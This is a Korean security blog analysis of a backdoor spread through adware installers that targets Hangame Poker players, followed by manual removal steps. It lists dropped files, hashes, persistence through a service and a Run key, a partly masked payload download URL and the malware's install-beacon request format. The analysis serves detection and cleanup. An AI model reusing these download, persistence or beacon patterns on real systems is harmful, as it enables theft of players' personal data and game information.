본문 바로가기

벌새::Analysis

한게임 포커(Poker)를 노리는 백도어 유포 주의 (2012.7.12)

예전부터 국내 광고 프로그램 등의 유포 경로를 통해 한게임(HanGame)을 노리는 백도어(Backdoor) 유포 행위가 심심찮게 발견이 되고 있었으며 유포 주기도 매우 짧은 형태로 치고 빠지는 것으로 보입니다.

 

이번에 살펴볼 유사한 변종은 Anti-VM 기법을 이용하여 가상 환경에서 분석을 어렵게 하고 있으며, 국내 특정 개인정보 확인 프로그램의 모바일 관련 코드로 추정되는 URL 주소가 포함되어 있는 것이 특징입니다. 

유포지를 확인해보면 특정 업데이트 서버에 인터넷 쇼핑몰 바로가기 아이콘을 생성하는 광고 프로그램과 함께 특정 카페24(Cafe24) 웹 호스팅 서버에 "teask"라는 프로그램으로 등록된 형태로 등록되어 있습니다.

 

이를 통해 외부의 어떤 프로그램은 업데이트를 시도하는 과정에서 해당 악성 파일(taskset.exe)을 자동으로 다운로드하여 몰래 설치할 것으로 보이며, 해당 파일(MD5 : 1c8b17a1a43117dc018f0f4222462994)에 대하여 Avira AntiVir 보안 제품에서 TR/Crypt.TPM.Gen (VirusTotal : 7/42) 진단명으로 진단되고 있습니다. 

설치시 연결되는 정보를 확인해보면 2개의 Cafe24 주소(112.175.50.145 / 119.205.197.86)를 이용하여 Mac Address 값을 이용한 파트너 아이디(TSK)가 추가된 설치 카운터(Counter) 체크 및 특정 업데이트 서버에 연결이 이루어지는 것을 확인할 수 있습니다.

 

[생성 폴더 / 파일 등록 정보]

 

C:\Documents and Settings\(사용자 계정)\Application Data\taskset :: 숨김(H) 속성 폴더
C:\Documents and Settings\(사용자 계정)\Application Data\taskset\cnservc.exe :: CNG lsolation 서비스 등록 파일

 - MD5 : d4a556af2369271ac95d492b4c0deec5

 

C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\TCKNT.exe

 - MD5 : 85ca2d1868322d181a00c21e1a156008

 - ESET NOD32 : probably a variant of Win32/Adware.Kraddare.DE (VirusTotal : 4/42)


C:\WINDOWS\taskrmv.exe :: 시작 프로그램 등록 파일 / 메모리 상주 프로세스

- MD5 : 8391322fa48f60db0f1db454b6ca1cbb

 - AhnLab V3 : ASD.Prevention (VirusTotal : 7/42)

 

이를 통해 사용자가 확인하기 어려운 숨김(H) 속성값을 가진 폴더 내의 "C:\Documents and Settings\(사용자 계정)\Application Data\taskset" 폴더에 서비스 등록 파일(cnservc.exe)을 추가하며, 윈도우 폴더 내에 생성된 "C:\WINDOWS\taskrmv.exe" 파일을 이용하여 시작 프로그램으로 등록하여 자동 실행되도록 구성되어 있습니다.

 

1. "C:\Documents and Settings\(사용자 계정)\Application Data\taskset\cnservc.exe" 파일 

해당 파일은 서비스에 "Keylso(CNG lsolation)" 항목을 등록하여 시스템 시작시 "C:\Documents and Settings\(사용자 계정)\Application Data\taskset\cnservc.exe" 파일을 자동으로 실행하도록 구성되어 있습니다.

 

이를 통해 "C:\WINDOWS\taskrmv.exe" 파일을 실행하여 메모리에 상주시키는 동작을 합니다. 

하지만 시스템 환경에 따라서는 시스템 부팅 과정에서 cnservc.exe 파일 오류창이 생성되는 동작을 확인할 수 있습니다.

 

2. "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\TCKNT.exe" 파일

GET /log/?modeAct=install&iMAC=(사용자 Mac Address)&iPID=TSK HTTP/1.1
User-Agent: TCKNT
Host: topbase***.cafe24.com

해당 파일은 감염 초기 과정에서 유포자 아이디(ID : TSK)와 감염 PC의 Mac Address 값을 기반으로 카운터(Counter)를 체크하도록 구성되어 있습니다.

 

3. "C:\WINDOWS\taskrmv.exe" 파일

 

해당 악성 파일은 Windows 시작시 자동을 시작 프로그램으로 등록하여 자동 실행되어 메모리에 상주하도록 제작되어 있습니다.(※ 일반적으로 시작 프로그램 등록 방식은 외부에 노출될 확률이 높으므로 추가적으로 cnservc.exe 서비스 파일을 통해서도 실행되도록 구성되어 있는 것으로 추정됩니다.) 

실행된 파일은 Cafe24에 등록된 특정 서버에서 한게임 포커(poker.hangame.com)을 표적으로 한 추가적인 악성 파일(ntrosa.exe)을 준비해 둔 것을 확인할 수 있습니다. 

특이한 점은 taskrmv.exe 파일을 확인하다보면 국내에서 제작되어 서비스가 이루어지고 있는 특정 개인정보 확인 프로그램의 모바일 관련 코드(mobil.*****boan.com)로 추정되는  포함되어 있는 것을 확인할 수 있습니다. 

  • h**p://topbase****.cafe24.com/ntrosa.exe (MD5 : ac06ab26b8731c731716ea7668de0311) - AhnLab V3 : ASD.Prevention (VirusTotal : 8/42)

실제 감염된 상태에서 한게임 포커로 접근을 시도할 경우 taskrmv.exe 파일은 특정 서버로부터 ntrosa.exe 파일을 인터넷 임시 폴더에 다운로드하여 "C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\hanedit.exe" 파일 형태로 생성을 시도합니다. 

하지만 해당 파일(hanedit.exe)은 Themida 패커를 통한 Anti-VM 기법으로 제작되어 특정 가상 환경에서는 실행되지 않도록 분석을 방해하고 있습니다. 

만약 정상적으로 동작이 이루어질 경우에는 추가적인 파일 생성을 통해 사용자가 한게임 포커 게임을 진행하는 과정에서 개인정보 유출 및 게임 훔쳐보기와 같은 방식으로 금전적 이득을 취할 것으로 추정됩니다.

 

해당 악성코드 감염시 수동으로 문제 해결을 원하시는 경우에는 다음과 같은 절차에 따라 삭제를 진행하시기 바랍니다.

 

(1) Windows 작업 관리자를 실행하여 taskrmv.exe 프로세스를 찾아 수동으로 종료하시기 바랍니다. 

단, 시스템 환경에 따라서는 taskrmv.exe 프로세스가 2개 생성되어 있을 수 있으므로 모두 종료하시기 바랍니다.

 

(2) 실행창에 [sc delete "Keylso"] 명령어를 입력하여 등록된 서비스 값을 삭제하시기 바랍니다.(※ "l" 문자는 알파벳 "L"의 소문자입니다.) 

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_KEYLSO
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Keylso

해당 명령어를 이용하여 위의 2개의 레지스트리 값이 삭제되므로 참고하시기 바랍니다.

 

(3) 윈도우 탐색기를 실행하여 다음의 폴더(파일)를 수동으로 삭제하시기 바랍니다.

 

  • C:\Documents and Settings\(사용자 계정)\Application Data\taskset
  • C:\Documents and Settings\(사용자 계정)\Application Data\taskset\cnservc.exe
  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\hanedit.exe
  • C:\Documents and Settings\(사용자 계정)\Local Settings\Temp\TCKNT.exe
  • C:\WINDOWS\taskrmv.exe

이 외에도 hanedit.exe 파일을 이용하여 추가적으로 생성된 악성 파일이 존재할 수 있으므로, 반드시 백신 프로그램을 이용하여 정밀 검사를 하시기 바랍니다.

 

(4) 레지스트리 편집기(regedit)를 실행하여 다음의 키값을 삭제하시기 바랍니다.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
 - taskrm = C:\WINDOWS\taskrmv.exe

해당 악성코드 유포는 중간 매개체로 광고성 프로그램이 포함되는 방식으로 보이므로, 사용자 PC에 설치된 정상적인 프로그램처럼 위장한 광고성 프로그램 등이 설치되지 않도록 주의하시기 바랍니다.